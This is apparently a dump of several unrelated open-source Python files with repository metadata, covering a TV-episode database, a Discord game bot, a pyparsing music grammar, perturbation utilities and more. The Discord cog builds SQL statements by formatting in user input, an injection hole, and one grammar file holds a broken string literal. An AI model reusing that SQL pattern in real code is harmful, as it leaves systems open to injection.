Show.status == Show.RUNNING,
Show.updated < today - delta_running
),
and_(
Show.enabled,
Show.status == Show.SUSPENDED,
Show.updated < today - delta_suspended
),
and_(
Show.enabled,
Show.status == Show.ENDED,
Show.updated < today - delta_ended
)
))
return shows.all()
def get_enabled_shows(self):
shows = self.session.query(Show).filter(Show.enabled)
return shows.all()
def get_show_by_url(self, url):
shows = self.session.query(Show).filter(Show.url == url)
if shows.count() < 1:
return None
return shows.first()
def get_show_by_id(self, show_id):
return self.session.query(Show).get(show_id)
def add_show(self, show):
show = self.session.merge(show)
self.session.flush()
return show
def remove_show(self, show_id):
show = self.session.query(Show).get(show_id)
if not show:
self.logger.error("No such show")
return
episodes = self.session.query(Episode)
for episode in episodes.filter(Episode.show_id == show.id):
self.session.delete(episode)
self.session.delete(show)
self.session.flush()
def get_shows(self):
return self.session.query(Show).all()
def add_episode(self, episode, show):
episode.show_id = show.id
self.session.merge(episode)
self.session.flush()
def get_episodes(self, basedate=date.today(), n_days=0):
enddate = basedate + timedelta(n_days)
return self.session.query(Episode).\
filter(Episode.airdate >= basedate). \
filter(Episode.airdate <= enddate). \
order_by(Episode.airdate).all()
def search(self, search):
return self.session.query(Episode).\
filter(or_( \
Episode.title.like("%%%s%%" % search),
Show.name.like("%%%s%%" % search))). \
order_by(Episode.airdate).all()
def commit(self):
self.session.commit()
self.session.begin()
def rollback(self):
self.session.rollback()
self.session.begin()
def remove_before(self, then, show=None):
eps = self.session.query(Episode).filter(Episode.airdate < then)
if show:
eps = eps.filter(Episode.show == show)
for episode in eps:
self.session.delete(episode)
self.commit()
| gpl-3.0 | -8,041,760,182,362,835,000 | 22.201365 | 71 | 0.682848 | false |
stepuncius/vk_mutual_friends_finder | vk_mutual_friends_finder/get_names_of_users.py | 1 | 1027 | import pyvkontakte
from collections import namedtuple
def get_names_of_users(set_of_users):
"""Takes set of user's ids and returns namedtuple
with their names, last names and link on their pages.
Caution: It can't work with more than 1000 people,
it's vkapi's feauture.
"""
VK_ADRESS = "https://vk.com/id"
assert type(set_of_users) == set, "Not set given"
if (len(set_of_users) > 1000):
print("only first thousand of users will be shown.")
api = pyvkontakte.VkontakteApi()
string_of_ids = ",".join(map(str, set_of_users))
response = api.call("users.get", user_ids=string_of_ids, v='5.8')
user = namedtuple(
'user', ['adress', 'first_name', 'last_name', 'id'])
result = [user(
adress=VK_ADRESS + str(usr['id']),
id=usr['id'],
first_name=usr['first_name'],
last_name=usr['last_name']
)
for usr in response]
return result
if __name__ == "__main__":
print(get_names_of_users(set((1, 3, 6))))
| bsd-2-clause | -5,208,632,784,300,567,000 | 33.233333 | 69 | 0.59591 | false |
motmot/flytrax | motmot/flytrax/trax_udp_sender.py | 1 | 4075 | import pkg_resources
import socket, threading
import wx
from wx import xrc
RESFILE = pkg_resources.resource_filename(__name__,"trax_udp_sender.xrc") # trigger extraction
RES = xrc.EmptyXmlResource()
RES.LoadFromString(open(RESFILE).read())
class UDPSender(object):
"""A base class for keeping track of a list of UDP receiver hostnames
Use this class in the following way to get a list of hostnames to send data to:
hosts = udp_sender_instance.get_downstream_hosts()
for host in hosts:
sockobj.sendto( 'hello', host)
"""
def __init__(self,frame):
self.frame = frame
self._remote_host_lock = threading.Lock()
self._remote_host_changed = threading.Event()
self._remote_host_caller = []
self._remote_host_gui = []
self.edit_udp_receivers_dlg = RES.LoadDialog(self.frame,"UDP_RECEIVER_DIALOG")
#####################
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_ADD")
ctrl.Bind(wx.EVT_BUTTON, self.OnUDPAdd )
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_EDIT")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPEdit)
ctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_REMOVE")
wx.EVT_BUTTON(ctrl,ctrl.GetId(),self.OnUDPRemove)
#######################
def get_downstream_hosts(self):
if self._remote_host_changed.isSet():
self._remote_host_lock.acquire()
try:
# copy items out of list shared across threads
self._remote_host_caller = self._remote_host_gui
self._remote_host_changed.clear()
finally:
self._remote_host_lock.release()
return self._remote_host_caller
def OnEditUDPReceivers(self,event):
self.edit_udp_receivers_dlg.ShowModal()
def remote_hosts_changed(self):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
n = listctrl.GetCount()
self._remote_host_lock.acquire()
try:
self._remote_host_changed.set()
self._remote_host_gui = []
for idx in range(n):
self._remote_host_gui.append( listctrl.GetClientData(idx) )
finally:
self._remote_host_lock.release()
def OnEnableSendToIP(self,event):
widget = event.GetEventObject()
if widget.IsChecked():
self.send_over_ip.set()
else:
self.send_over_ip.clear()
def OnUDPAdd(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
dlg = wx.TextEntryDialog(self.wx_parent,
'Please add the hostname',
)
try:
if dlg.ShowModal() == wx.ID_OK:
hostname = dlg.GetValue()
try:
ip = socket.gethostbyname(hostname)
except socket.gaierror, x:
dlg2 = wx.MessageDialog(dlg,
'error getting IP address: '+str(x),
'FlyTrax: socket error',
wx.OK | wx.ICON_ERROR)
dlg2.ShowModal()
dlg2.Destroy()
else:
remote_host = (ip, 28931)
if hostname != '':
toshow = hostname
else:
toshow = str(ip)
idx = listctrl.Append( toshow )
listctrl.SetClientData(idx,remote_host)
self.remote_hosts_changed()
finally:
dlg.Destroy()
def OnUDPEdit(self,event):
widget = event.GetEventObject()
def OnUDPRemove(self,event):
listctrl = xrc.XRCCTRL(self.edit_udp_receivers_dlg,"UDP_RECEIVER_LIST")
idx = listctrl.GetSelection()
if idx==wx.NOT_FOUND:
return
remote_host = listctrl.GetClientData(idx)
listctrl.Delete(idx)
self.remote_hosts_changed()
| bsd-3-clause | -2,490,107,922,923,382,000 | 33.533898 | 94 | 0.547485 | false |
mmclenna/engine | sky/build/template.py | 1 | 1665 | #!/usr/bin/env python
#
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Renders a single template file using the Jinga templating engine.'''
import argparse
import sys
import os
import itertools
sys.path.append(os.path.join(os.path.dirname(__file__), '../../third_party'))
import jinja2
from jinja2 import Environment, FileSystemLoader
def make_stamp_file(stamp_path):
dir_name = os.path.dirname(stamp_path)
with open(stamp_path, 'a'):
os.utime(stamp_path, None)
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--template', help='The template file to render')
parser.add_argument('--stamp', help='The template stamp file')
parser.add_argument('--output',
help='The output file to render the template to')
parser.add_argument('vars', metavar='V', nargs='+',
help='A list of key value pairs used as template args')
args = parser.parse_args()
template_file = os.path.abspath(args.template)
if not os.path.isfile(template_file):
print 'Cannot find file at path: ', template_file
return 1
env = jinja2.Environment(loader=FileSystemLoader('/'),
undefined=jinja2.StrictUndefined)
template = env.get_template(template_file)
variables = dict(itertools.izip_longest(*[iter(args.vars)] * 2, fillvalue=''))
output = template.render(variables)
with open(os.path.abspath(args.output), 'wb') as file:
file.write(output)
make_stamp_file(args.stamp)
if __name__ == '__main__':
main()
| bsd-3-clause | 4,045,351,747,393,844,700 | 27.220339 | 80 | 0.679279 | false |
pyfa-org/eos | eos/eve_obj/effect/dmg_dealer/fighter/missiles.py | 1 | 1879 | # ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos.const.eve import AttrId
from eos.eve_obj.effect.dmg_dealer.base import DmgDealerEffect
from eos.eve_obj.effect.fighter_effect import FighterEffect
from eos.stats_container import DmgStats
class FighterAbilityMissiles(DmgDealerEffect, FighterEffect):
def get_volley(self, item):
if not self.get_cycles_until_reload(item):
return DmgStats(0, 0, 0, 0)
em = item.attrs.get(AttrId.fighter_ability_missiles_dmg_em, 0)
therm = item.attrs.get(AttrId.fighter_ability_missiles_dmg_therm, 0)
kin = item.attrs.get(AttrId.fighter_ability_missiles_dmg_kin, 0)
expl = item.attrs.get(AttrId.fighter_ability_missiles_dmg_expl, 0)
dmg_mult = item.attrs.get(AttrId.fighter_ability_missiles_dmg_mult, 1)
squad_size = self.get_squad_size(item)
mult = dmg_mult * squad_size
return DmgStats(em, therm, kin, expl, mult)
def get_applied_volley(self, item, tgt_data):
raise NotImplementedError
| lgpl-3.0 | -1,862,110,855,468,433,400 | 42.697674 | 80 | 0.662586 | false |
aaiijmrtt/MUSICALQA | code/language.py | 1 | 3650 | import pyparsing
literals = lambda literallist: pyparsing.Or([pyparsing.Literal(literal) for literal in literallist])
times = literals(['breve', 'breves', 'semibreve','semibreves', 'minim', 'minims', 'crotchets', 'crotchet', 'quavers', 'quaver', 'semiquaver','semiquavers', 'demisemiquaver', 'demisemiquavers'])
augmentedtimes = literals(['dotted', 'double dotted'])
notes = literals(['B', 'C', 'D', 'E', 'F', 'G', 'Do', 'Re', 'Mi', 'Fa', 'Sol', 'La', 'Ti', 'do', 're', 'mi', 'fa', 'sol', 'la', 'ti'])
augmentednotes = literals(['#', 'b'])
octave = literals(['1', '2', '3', '4', '5', '6', '7'])
instruments = literals(['flute', 'oboe', 'violin', 'violin I', 'violin II', 'timpani', 'double basses', 'cello', 'bass', 'horn', 'piano', 'harpsichord'])
hands = literals(['right', 'left'])
conjunction = literals(['against', 'followed by'])
clef = literals(['bass', 'treble'])
alphanumerals = literals(['one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'eleven', 'twelve'])
passage = literals(['homophonic', 'monophonic', 'polyphonic'])
query = pyparsing.And([
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
alphanumerals,
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('chord'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
pyparsing.Group(pyparsing.Optional(augmentedtimes)),
times
])
)
),
pyparsing.Group(
pyparsing.ZeroOrMore(
pyparsing.And([
notes,
pyparsing.Group(pyparsing.Optional(augmentednotes)),
pyparsing.Group(pyparsing.Optional(octave))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.Or([
pyparsing.Literal('rest'),
pyparsing.Literal('notes'),
pyparsing.Literal('note'),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
alphanumerals,
pyparsing.Or([
pyparsing.Literal('note'),
pyparsing.Literal('notes')
]),
pyparsing.Literal('melody')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal("on the word ""),
pyparsing.ZeroOrMore(pyparsing.Word(pyparsing.alphas)),
pyparsing.Literal("!"")
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
passage,
pyparsing.Literal('passage')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Or([
pyparsing.Literal('in bars'),
pyparsing.Literal('in measures')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Or([
pyparsing.Literal('-'),
pyparsing.Literal('to')
]),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums))
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('/'),
pyparsing.OneOrMore(pyparsing.Word(pyparsing.nums)),
pyparsing.Literal('time')
]),
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
clef,
pyparsing.Literal('clef')
])
)
),
pyparsing.Group(
pyparsing.Optional(
pyparsing.And([
pyparsing.Literal('in the'),
instruments
])
)
)
])
compound = pyparsing.And([
query,
pyparsing.ZeroOrMore(
pyparsing.And([
conjunction,
query
])
)
])
def parse(question):
return query.parseString(question).asList()
if __name__ == '__main__':
print parse('dotted crotchet G6')
| mit | -770,983,344,402,978,700 | 22.101266 | 193 | 0.629041 | false |
doshaq/Doshabot | cogs/game.py | 1 | 1090 | from discord.ext import commands
import sqlite3
class game :
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
def __init__(self, bot):
self.bot = bot
conn = sqlite3.connect('bot_game.db')
c = conn.cursor()
@commands.command(pass_context=True, no_pm=True)
async def join_game(self, ctx, *keywords):
self.c.execute("INSERT INTO players VALUES('{}','{}','{}','talking_island',1,NULL,'false')".format(str(ctx.message.author),keywords[0],keywords[1]))
self.conn.commit()
await self.bot.say("تم اضافتك للعبه")
@commands.command(pass_context=True,no_pm=True)
async def login(self,ctx):
self.c.execute("UPDATE players SET connect='true' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم الاتصال")
@commands.command(pass_context=True,no_pm=True)
async def logout(self,ctx):
self.c.execute("UPDATE players SET connect='false' WHERE username ='{}'".format(str(ctx.message.author)))
self.conn.commit()
await self.bot.say("تم قطع الاتصال")
def setup(bot):
bot.add_cog(game(bot)) | gpl-3.0 | 7,310,226,834,112,171,000 | 39.653846 | 150 | 0.700758 | false |
tgquintela/pySpatialTools | pySpatialTools/utils/perturbations/perturbations.py | 1 | 23997 |
"""
Perturbations
-------------
Module oriented to perform a perturbation of the system in order to carry out
with statistical testing of models.
The main function of this module is grouping functions which are able to
change the system to other statistically probable options in order to explore
the sample space.
TODO
----
-Aggregation perturbation:
--- Discretization perturbed.
--- Fluctuation of features between borders.
- Fluctuation of borders
--- Fluctuation of edge points
--- Fluctuation over sampling points
"""
import numpy as np
###############################################################################
############################ Location perturbation ############################
###############################################################################
class BasePerturbation:
"""General perturbation. It constains default functions for perturbation
objects.
"""
def _initialization(self):
self.locations_p = None
self.features_p = None
self.relations_p = None
self.discretizations_p = None
self.k_perturb = 1
## Ensure correctness
self.assert_correctness()
def assert_correctness(self):
"""Assert the correct Perturbation class."""
assert('_categorytype' in dir(self))
assert('_perturbtype' in dir(self))
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return i
################## Transformations of the main elements ###################
def apply2locs(self, locations):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return locations
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
return features
def apply2relations(self, relations):
"""Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return relations
def apply2discretizations(self, discretization):
"""Apply perturbation to discretization.
Parameters
----------
discretization: np.ndarray or others
the discretization perturbation.
Returns
-------
discretization: np.ndarray or others
the discretization perturbation.
"""
return discretization
######################### Precomputed applications ########################
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return self.features_p[i, :, k]
def apply2locs_ind(self, locations, i, k):
"""Apply perturbation to locations individually for precomputed
applications.
Parameters
----------
locations: np.ndarray or others
the spatial information to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the spatial information perturbated.
"""
return self.locations_p[i, :, k]
def apply2relations_ind(self, relations, i, k):
"""For precomputed applications. Apply perturbation to relations.
Parameters
----------
relations: np.ndarray or others
the relations between elements to be perturbated.
Returns
-------
relations: np.ndarray or others
the relations between elements perturbated.
"""
return self.relations_p[i, :, k]
##################### Selfcomputation of main elements ####################
def selfcompute_features(self, features):
pass
def selfcompute_locations(self, locations):
pass
def selfcompute_relations(self, relations):
pass
def selfcompute_discretizations(self, discretizations):
pass
################################# Examples ################################
# def selfcompute_locations(self, locations):
# self.locations_p = self.apply2locs(locations)
#
# def selfcompute_features(self, features):
# self.features_p = self.apply2features(features)
###############################################################################
############################## None perturbation ##############################
###############################################################################
class NonePerturbation(BasePerturbation):
"""None perturbation. Default perturbation which not alters the system."""
_categorytype = "general"
_perturbtype = "none"
def __init__(self, k_perturb=1):
"""The none perturbation, null perturbation where anything happens.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self.k_perturb = k_perturb
###############################################################################
############################ Location perturbation ############################
###############################################################################
class JitterLocations(BasePerturbation):
"""Jitter module to perturbe locations of the system in order of testing
methods.
TODO: Fit some model for infering stds.
"""
_categorytype = "location"
_perturbtype = "jitter_coordinate"
def __init__(self, stds=0, k_perturb=1):
"""The jitter locations apply to locations a jittering perturbation.
Parameters
----------
k_perturb: int (default=1)
the number of perturbations applied.
"""
self._initialization()
self._stds = np.array(stds)
self.k_perturb = k_perturb
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
locations_p = np.zeros((len(locations), locations.shape[1], len(ks)))
for ik in range(len(ks)):
jitter_d = np.random.random(locations.shape)
locations_pj = np.multiply(self._stds, jitter_d) + locations
locations_p[:, :, ik] = locations_pj
return locations_p
class PermutationPerturbationLocations(BasePerturbation):
"""Reindice perturbation for the whole locations."""
_categorytype = "location"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Perturbations by permuting locations.
Parameters
----------
reindices: np.ndarray
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2locs(self, locations, k=None):
"""Apply perturbation to locations.
Parameters
----------
locations: np.ndarray
the spatial information to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
locations: np.ndarray
the spatial information perturbated.
"""
## Preparation of ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
##Be coherent with the input location types
ndim = 1 if '__len__' not in dir(locations[0]) else len(locations[0])
if type(locations) == np.ndarray:
locations_p = np.zeros((len(locations), ndim, len(ks)))
for ik in range(len(ks)):
locations_p[:, :, ik] = locations[self.reindices[:, ks[ik]]]
else:
locations_p = [[[]]*len(locations)]*len(ks)
for ik in range(len(ks)):
for i in range(len(locations)):
locations_p[ik][i] = locations[self.reindices[i, ks[ik]]]
return locations_p
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
###############################################################################
########################### Permutation perturbation ##########################
###############################################################################
class PermutationPerturbation(BasePerturbation):
"""Reindice perturbation for the whole features variables."""
_categorytype = "feature"
_perturbtype = "element_permutation"
def __init__(self, reindices):
"""Element perturbation for all permutation perturbation.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
self._initialization()
self._format_reindices(reindices)
def _format_reindices(self, reindices):
"""Format reindices for permutation reindices.
Parameters
----------
reindices: np.ndarray or tuple
the reindices to apply permutation perturbations.
"""
if type(reindices) == np.ndarray:
self.k_perturb = reindices.shape[1]
self.reindices = reindices
elif type(reindices) == tuple:
n, k_perturb = reindices
if type(n) == int and type(k_perturb) == int:
self.k_perturb = k_perturb
self.reindices = np.vstack([np.random.permutation(n)
for i in xrange(k_perturb)]).T
def apply2features(self, features, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Assert good features
assert len(features) == len(self.reindices)
## Prepare ks
ks = range(self.k_perturb) if k is None else k
ks = [k] if type(k) == int else ks
## Computation of new prturbated features
sh = len(features), features.shape[1], len(ks)
features_p = np.zeros(sh)
for ik in range(len(ks)):
features_p[:, :, ik] = features[self.reindices[:, ks[ik]], :]
return features_p
def apply2features_ind(self, features, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return features[self.reindices[i, k]]
def apply2indice(self, i, k):
"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
class PermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables."""
def __init__(self, n, m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=Npne)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
self._format_reindices((n, m))
class PartialPermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables. It can control
the proportion of the whole sample is going to be permuted.
"""
def __init__(self, n, rate_pert=1., m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=Npne)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
if rate_pert == 1.:
self._format_reindices((n, m))
else:
n_sample = int(n*rate_pert)
indices = np.random.permutation(n)[:n_sample]
reindices = np.vstack([np.arange(n) for i in xrange(m)]).T
reindices[indices] = np.vstack([np.random.permutation(n_sample)
for i in xrange(m)]).T
self.k_perturb = m
self.reindices = reindices
###############################################################################
############################# Element perturbation ############################
###############################################################################
## TODO:
class MixedFeaturePertubation(BasePerturbation):
"""An individual-column-created perturbation of individual elements."""
_categorytype = "feature"
_perturbtype = "element_mixed"
def __init__(self, perturbations):
"""The MixedFeaturePertubation is the application of different
perturbations to features.
perturbations: list
the list of pst.BasePerturbation objects.
"""
msg = "Perturbations is not a list of individual perturbation methods."
self._initialization()
if type(perturbations) != list:
raise TypeError(msg)
try:
self.typefeats = [p._perturbtype for p in perturbations]
k_perturbs = [p.k_perturb for p in perturbations]
assert all([k == k_perturbs[0] for k in k_perturbs])
self.k_perturb = k_perturbs[0]
self.perturbations = perturbations
except:
raise TypeError(msg)
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
assert features.shape[1] == len(self.perturbations)
## Apply individual perturbation for each features
features_p, n = [], len(features)
k_pos = list(range(self.k_perturb))
for i in range(len(self.perturbations)):
features_p_k =\
self.perturbations[i].apply2features(features[:, [i]], k_pos)
features_p_k = features_p_k.reshape((n, 1, self.k_perturb))
features_p.append(features_p_k)
features_p = np.concatenate(features_p, axis=1)
return features_p
########################### Individual perturbation ###########################
###############################################################################
class DiscreteIndPerturbation(BasePerturbation):
"""Discrete perturbation of a discrete feature variable."""
_categorytype = "feature"
_perturbtype = "discrete"
def __init__(self, probs):
"""The discrete individual perturbation to a feature variable.
Parameters
----------
probs: np.ndarray
the probabilities to change from a value of a category to another
value.
"""
self._initialization()
if np.all(probs.sum(1) != 1):
raise TypeError("Not correct probs input.")
if probs.shape[0] != probs.shape[1]:
raise IndexError("Probs is noot a square matrix.")
self.probs = probs.cumsum(1)
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Prepare loop
categories = np.unique(feature)
if len(categories) != len(self.probs):
msg = "Not matching dimension between probs and features."
raise IndexError(msg)
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
## Compute each change
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
for i in xrange(len(feature)):
r = np.random.random()
idx = np.where(feature[i] == categories)[0]
idx2 = np.where(self.probs[idx] > r)[0][0]
feature_p[i, i_k] = categories[idx2]
return feature_p
class ContiniousIndPerturbation(BasePerturbation):
"""Continious perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "continious"
def __init__(self, pstd):
"""The continious individual perturbation to a feature variable.
Parameters
----------
pstd: float
the dispersion measure of the jittering.
"""
self._initialization()
self.pstd = pstd
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
jitter_d = np.random.random(len(feature))
feature_p[:, i_k] = np.multiply(self.pstd, jitter_d)
return feature_p
class PermutationIndPerturbation(BasePerturbation):
"""Reindice perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "permutation_ind"
def __init__(self, reindices=None):
"""Individual feature perturbation.
Parameters
----------
reindices: np.ndarray (default=None)
the reindices to apply permutation perturbations.
"""
self._initialization()
if type(reindices) == np.ndarray:
self.reindices = reindices
self.k_perturb = reindices.shape[1]
else:
raise TypeError("Incorrect reindices.")
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
feature_p[:, [i_k]] = feature[self.reindices[:, i_k]]
return feature_p
def apply2features_ind(self, feature, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return feature[self.reindices[i, k]]
###############################################################################
########################### Aggregation perturbation ##########################
###############################################################################
class JitterRelationsPerturbation(BasePerturbation):
"""Jitter module to perturbe relations of the system in order of testing
methods.
"""
_categorytype = "relations"
| mit | -2,054,015,461,161,471,700 | 30.124514 | 79 | 0.535817 | false |
mattvonrocketstein/smash | tests/units/test_utils.py | 1 | 1228 | """ tests/test_utils
"""
import os
from smashlib.testing import TestCase, hijack_ipython_module, main
from smashlib.plugins.smash_completer import SmashCompleter, smash_env_complete
from smashlib.overrides import SmashTerminalInteractiveShell
from mock import Mock
hijack_ipython_module()
from IPython.testing.tools import default_config
from IPython.core.completerlib import TryNext
from IPython.testing.globalipapp import get_ipython
from smashlib.util import bash
ffile = os.path.join(os.path.dirname(__file__),
'function.sh')
class TestUtils(TestCase):
def setUp(self):
return
self.shell = Mock()
self.config = default_config()
self.shell.config = self.config
self.plugin = SmashCompleter(self.shell)
self.event = Mock()
def test_get_functions_from_file(self):
self.assertTrue(os.path.exists(ffile))
self.assertEqual(
['simple_function'],
bash.get_functions_from_file(ffile))
def test_run_function_from_file(self):
self.assertEqual(
bash.run_function_from_file(
'simple_function', ffile),
['simple bash function'])
if __name__=='__main__':
main()
| mit | -5,957,990,363,373,603,000 | 31.315789 | 79 | 0.668567 | false |
hlzz/dotfiles | graphics/VTK-7.0.0/Examples/DataManipulation/Python/FinancialField.py | 1 | 8881 | #!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
patn = re.compile('[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
val = patn.findall(line)
ret = []
for i in val:
ret.append(float(i))
return ret
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
global VTK_DATA_ROOT, dos
# Use Python to read an ASCII file
file = open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r")
line = file.readline()
numPts = int(getNumberFromLine(line)[0])
numLines = (numPts - 1)//8
# Get the data object's field data and allocate
# room for 4, fields
fieldData = dos.GetOutput().GetFieldData()
fieldData.AllocateArrays(4)
# read TIME_LATE - dependent variable
